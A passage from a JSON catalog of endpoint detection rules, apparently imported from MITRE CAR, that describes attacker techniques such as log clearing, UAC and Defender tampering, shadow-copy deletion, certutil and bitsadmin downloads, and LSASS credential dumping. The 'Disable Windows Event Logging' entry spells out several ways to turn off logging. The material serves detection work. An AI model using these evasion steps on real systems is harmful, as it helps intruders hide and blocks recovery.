"Often, after a threat actor gains access to a 
system, they will attempt to run some kind of malware to further infect the victim machine. These malware often have long command line strings, which could be a possible indicator of attack. Here, we use sysmon and Splunk to first find the average command string length and search for command strings that stretch over multiple lines, thus identifying anomalies and possibly malicious commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-002.yaml" } }, { "id": "mitre-car-car-2021-01-003", "type": "detection", "name": "Clearing Windows Logs with Wevtutil", "description": "In an attempt to clear traces after compromising a machine, threat actors often try to clear Windows Event logs. This is often done using \u201cwevtutil\u201d, a legitimate tool provided by Microsoft. 
This action interferes with event collection and notification, and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-003.yaml" } }, { "id": "mitre-car-car-2021-01-004", "type": "detection", "name": "Unusual Child Process for Spoolsv.Exe or Connhost.Exe", "description": "After gaining initial access to a system, threat actors attempt to escalate privileges as they may be operating within a lower privileged process which does not allow them to access protected information or carry out tasks which require higher permissions. A common way of escalating privileges in a system is by externally invoking and exploiting spoolsv or connhost executables, both of which are legitimate Windows applications. 
This query searches for an invocation of either of these executables by a user, thus alerting us of any potentially malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-004.yaml" } }, { "id": "mitre-car-car-2021-01-006", "type": "detection", "name": "Unusual Child Process spawned using DDE exploit", "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. 
Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1559" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-006.yaml" } }, { "id": "mitre-car-car-2021-01-007", "type": "detection", "name": "Detecting Tampering of Windows Defender Command Prompt", "description": "In an attempt to avoid detection after compromising a machine, threat actors often try to disable Windows Defender. This is often done using \u201csc\u201d [service control], a legitimate tool provided by Microsoft for managing services. 
This action interferes with event detection and may lead to a security event going undetected, thereby potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-007.yaml" } }, { "id": "mitre-car-car-2021-01-008", "type": "detection", "name": "Disable UAC", "description": "Threat actors often, after compromising a machine, try to disable User Access Control (UAC) to escalate privileges. This is often done by changing the registry key for system policies using \u201creg.exe\u201d, a legitimate tool provided by Microsoft for modifying the registry via command prompt or scripts. 
This action interferes with UAC and may enable a threat actor to escalate privileges on the compromised system, thereby allowing further exploitation of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-008.yaml" } }, { "id": "mitre-car-car-2021-01-009", "type": "detection", "name": "Detecting Shadow Copy Deletion or Resize", "description": "After compromising a network of systems, threat actors often try to delete/resize Shadow Copy in an attempt to prevent administrators from restoring the systems to versions present before the attack. This is often done via vssadmin, a legitimate Windows tool to interact with shadow copies. This action is often employed by ransomware and may lead to a failure in recovering systems after an attack. The pseudo-code detection focuses on Windows Security and Sysmon process creation (4688 and 1). The use of wmic to delete shadow copy generates WMI-Activity Operational 5857 event and could generate 5858 (if the operation fails). 
These 2 EventIDs could be interesting when attackers use wmic without process creation and/or for forensics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-01-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-01-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-01-009.yaml" } }, { "id": "mitre-car-car-2021-02-001", "type": "detection", "name": "Webshell-Indicative Process Tree", "description": "A web shell is a web script placed on an openly accessible web server to allow an adversary to use the server as a gateway into a network. As the shell operates, commands will be issued from within the web application into the broader server operating system. 
This analytic looks for host enumeration executables initiated by any web service that would not normally be executed within that environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1505" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-02-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-02-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-02-001.yaml" } }, { "id": "mitre-car-car-2021-02-002", "type": "detection", "name": "Get System Elevation", "description": "Cyber actors frequently escalate to the SYSTEM account after gaining entry to a Windows host, to enable them to carry out various attacks more effectively. Tools such as Meterpreter, Cobalt Strike, and Empire carry out automated steps to \"Get System\", which is the same as switching over to the System user account. Most of these tools utilize multiple techniques to try and attain SYSTEM: in the first technique, they create a named pipe and connect an instance of cmd.exe to it, which allows them to impersonate the security context of cmd.exe, which is SYSTEM. In the second technique, a malicious DLL is injected into a process that is running as SYSTEM; the injected DLL steals the SYSTEM token and applies it where necessary to escalate privileges. 
This analytic looks for both of these techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-02-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-02-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-02-002.yaml" } }, { "id": "mitre-car-car-2021-04-001", "type": "detection", "name": "Common Windows Process Masquerading", "description": "[Masquerading (T1036)](https://attack.mitre.org/techniques/T1036/) is defined by ATT&CK as follows:\n\n\"Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\"\n\nMalware authors often use this technique to hide malicious executables behind legitimate Windows executable names (e.g. 
`lsass.exe`, `svchost.exe`, etc).\n\nThere are several sub-techniques, but this analytic focuses on [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/) only.\n\n**Analytic Methodology**\n\nWith process monitoring, hunt for processes matching these criteria:\n\n* process name is `svchost.exe`, `smss.exe`, `wininit.exe`, `taskhost.exe`, etc.\n* process path is not `C:\\Windows\\System32\\` or `C:\\Windows\\SysWow64\\`\n\nExamples (true positive):\n\n`C:\\Users\\administrator\\svchost.exe`\n\nTo make sure the rule doesn't miss cases where the executable would be started from a sub-folder of these locations, the entire path is checked for the process path. The below example should be considered as suspicious:\n\n`C:\\Windows\\System32\\srv\\svchost.exe`", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-04-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-04-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-04-001.yaml" } }, { "id": "mitre-car-car-2021-05-001", "type": "detection", "name": "Attempt To Add Certificate To Untrusted Store", "description": "Adversaries may add their own root certificate to the certificate store, to cause the web browser to trust that certificate and not display a security warning when it encounters the previously unseen certificate. 
This action may be the precursor to malicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-001.yaml" } }, { "id": "mitre-car-car-2021-05-002", "type": "detection", "name": "Batch File Write to System32", "description": "While batch files are not inherently malicious, it is uncommon to see them created after OS installation, especially in the Windows directory. This analytic looks for the suspicious activity of a batch file being created within the C:\\Windows\\System32 directory tree. 
There will be only occasional false positives due to administrator actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-002.yaml" } }, { "id": "mitre-car-car-2021-05-003", "type": "detection", "name": "BCDEdit Failure Recovery Modification", "description": "This search looks for flags passed to bcdedit.exe modifications to the built-in Windows error recovery boot configurations. This is typically used by ransomware to prevent recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-003.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-003", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-003.yaml" } }, { "id": "mitre-car-car-2021-05-004", "type": "detection", "name": "BITS Job Persistence", "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. 
Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-004.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-004", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-004.yaml" } }, { "id": "mitre-car-car-2021-05-005", "type": "detection", "name": "BITSAdmin Download File", "description": "The following query identifies Microsoft Background Intelligent Transfer Service utility `bitsadmin.exe` using the `transfer` parameter to download a remote object. In addition, look for `download` or `upload` on the command-line, the switches are not required to perform a transfer. Capture any files downloaded. Review the reputation of the IP or domain used. Typically once executed, a follow on command will be used to execute the dropped file. Note that the network connection or file modification events related will not spawn or create from `bitsadmin.exe`, but the artifacts will appear in a parallel process of `svchost.exe` with a command-line similar to `svchost.exe -k netsvcs -s BITS`. It's important to review all parallel and child processes to capture any behaviors and artifacts. In some suspicious and malicious instances, BITS jobs will be created. 
You can use `bitsadmin /list /verbose` to list out the jobs during investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1197", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-005.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-005", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-005.yaml" } }, { "id": "mitre-car-car-2021-05-006", "type": "detection", "name": "CertUtil Download With URLCache and Split Arguments", "description": "Certutil.exe may download a file from a remote destination using `-urlcache`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. However, it is uncommon for `certutil.exe` to write files to world writeable paths.\\ During triage, capture any files on disk and review. 
Review the reputation of the remote IP or domain in question.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-006.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-006", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-006.yaml" } }, { "id": "mitre-car-car-2021-05-007", "type": "detection", "name": "CertUtil Download With VerifyCtl and Split Arguments", "description": "Certutil.exe may download a file from a remote destination using `-VerifyCtl`. This behavior does require a URL to be passed on the command-line. In addition, `-f` (force) and `-split` (Split embedded ASN.1 elements, and save to files) will be used. It is not entirely common for `certutil.exe` to contact public IP space. \\ During triage, capture any files on disk and review. Review the reputation of the remote IP or domain in question. 
Using `-VerifyCtl`, the file will either be written to the current working directory or `%APPDATA%\\..\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\`.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-007.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-007", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-007.yaml" } }, { "id": "mitre-car-car-2021-05-008", "type": "detection", "name": "Certutil exe certificate extraction", "description": "This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1606" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-008.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-008", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-008.yaml" } }, { "id": "mitre-car-car-2021-05-009", "type": "detection", "name": "CertUtil With Decode Argument", "description": "CertUtil.exe may be used to `encode` and `decode` a file, including PE and script code. 
Encoding will convert a file to base64 with `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----` tags. Malicious usage will include decoding an encoded file that was downloaded. Once decoded, it will be loaded by a parallel process. Note that there are two additional command switches that may be used - `encodehex` and `decodehex`. Similarly, the file will be encoded in HEX and later decoded for further execution. During triage, identify the source of the file being decoded. Review its contents or execution behavior for further analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-009.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-009", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-009.yaml" } }, { "id": "mitre-car-car-2021-05-010", "type": "detection", "name": "Create local admin accounts using net exe", "description": "This search looks for the creation of local administrator accounts using net.exe.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1136" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-010.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-010", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": 
"analytics/CAR-2021-05-010.yaml" } }, { "id": "mitre-car-car-2021-05-011", "type": "detection", "name": "Create Remote Thread into LSASS", "description": "Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-011.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-011", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-011.yaml" } }, { "id": "mitre-car-car-2021-05-012", "type": "detection", "name": "Create Service In Suspicious File Path", "description": "This detection is to identify a creation of \"user mode service\" where the service file path is located in non-common service folder in windows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1569" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-05-012.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-05-012", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-05-012.yaml" } }, { "id": "mitre-car-car-2021-11-001", "type": "detection", "name": "Registry Edit with Creation of SafeDllSearchMode Key Set to 0", "description": "Detection of creation of registry key 
HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\SafeDllSearchMode. The key SafeDllSearchMode, if set to 0, will block the Windows mechanism for the search DLL order and adversaries may execute their own malicious dll.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1574", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-11-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-11-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-11-001.yaml" } }, { "id": "mitre-car-car-2021-11-002", "type": "detection", "name": "Registry Edit with Modification of Userinit, Shell or Notify", "description": "Detection of modification of the registry key values of `Notify`, `Userinit`, and `Shell` located in `HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\` and `HKEY_LOCAL_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\`. When a user logs on, the Registry key values of `Notify`, `Userinit` and `Shell` are used to load dedicated Windows component. 
Attackers may insert malicious payload following the legitimate value to launch a malicious payload.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-11-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-11-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-11-002.yaml" } }, { "id": "mitre-car-car-2021-12-001", "type": "detection", "name": "Scheduled Task Creation or Modification Containing Suspicious Scripts, Extensions or User Writable Paths", "description": "Detection of the creation or modification of Scheduled Tasks with a suspicious script, extension or user writable path. Attackers may create or modify Scheduled Tasks for the persistent execution of malicious code. 
This detection focuses at the same time on EventIDs 4688 and 1 with process creation (SCHTASKS) and EventID 4698, 4702 for Scheduled Task creation/modification event log.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1053" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-12-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-12-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-12-001.yaml" } }, { "id": "mitre-car-car-2021-12-002", "type": "detection", "name": "Modification of Default Startup Folder in the Registry Key 'Common Startup'", "description": "Detection of the modification of the registry key `Common Startup` located in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\` and `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\`. When a user logs on, any files located in the Startup Folder are launched. Attackers may modify these folders with other files in order to evade detection set on these default folders. 
This detection focuses on EventIDs 4688 and 1 for process creation and EventID 4657 for the modification of the Registry Keys.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1547", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2021-12-002.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2021-12-002", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2021-12-002.yaml" } }, { "id": "mitre-car-car-2022-03-001", "type": "detection", "name": "Disable Windows Event Logging", "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more. This data is used by security tools and analysts to generate detections. There are different ways to perform this attack.\n1. The first one is to create the Registry Key `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MiniNt`. This action will not generate Security EventLog 4657 or Sysmon EventLog 13 because the value of the key remains empty. However, if an attacker uses powershell to perform this attack (and not cmd), a Security EventLog 4663 will be generated (but 4663 generates a lot of noise).\n2. The second way is to disable the service EventLog (display name Windows Event Log). After it is disabled, the attacker must reboot the system. 
Setting the service to Disabled or Manual modifies the registry value `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\start`, so Security EventLog 4657 or Sysmon EventLog 13 will be generated on the system.\n3. The third way is linked with the second. By default, the EventLog service cannot be stopped: if an attacker tries to stop it, it restarts immediately. This is because, to stop completely, the service must first stop the services that depend on it, in particular netprofm (display name Network List Service), which keeps running until it is disabled. The attacker must therefore either disable EventLog and then stop it, or disable netprofm and then stop EventLog. Merely stopping the service (even as an administrator) has no effect on EventLog because of the dependency on netprofm. Security EventLog 1100 will log the stop of the EventLog service (but it is also noisy because it is written every time the system shuts down).\n4. The fourth way is to use auditpol.exe to modify the audit configuration and disable/modify important parameters, which stops the corresponding event logs from being created.\n5. The last one is to modify the registry value `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security\\file` (or the equivalent for another log) to change the path where the event log is stored. Importantly, with this technique the Event Viewer uses the registry value \"file\" to locate the log. Thus Event Viewer will always show the current event logs, while the old ones remain stored in another evtx file. Also, the path must be in a folder that the EventLog process can access (for example, it does not work if the attacker points the path at the Desktop). The attacker can also decrease the maxsize value of the log to force the system to overwrite older events (but the minimum cannot be less than 1028 KB). 
As the registry value is modified, Security EventLog 4657 or Sysmon EventLog 13 will be generated on the system. All of these attacks require administrative rights. Attacks three, four and five take effect immediately, without a system reboot.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "mitre-car", "tier": "imported", "enabled": false, "path": "detections/car-imports/endpoint/car-2022-03-001.yaml", "provenance": { "source": "mitre-attack/car", "source_id": "CAR-2022-03-001", "source_commit": "1b922fe", "license": "Apache-2.0", "license_url": "https://github.com/mitre-attack/car/blob/master/LICENSE.txt", "imported_at": "2026-05-04", "upstream_path": "analytics/CAR-2022-03-001.yaml" } }, { "id": "oauth-abuse-response-v1", "type": "detection", "name": "OAuth Application Abuse Response", "description": "Responds to OAuth application abuse including consent phishing, malicious app grants, and unauthorized OAuth token usage. Revokes malicious app access, audits all consented apps, and notifies affected users.", "version": "1.0.0", "author": "Beenu - beenu@cyble.com", "tags": [ "oauth", "identity", "saas", "consent-phishing", "app-abuse" ], "severity": null, "category": "playbooks", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/playbooks/oauth-abuse-response.yaml" }, { "id": "phishing-response-v1", "type": "detection", "name": "Phishing Email Response", "description": "Responds to confirmed or suspected phishing emails. 
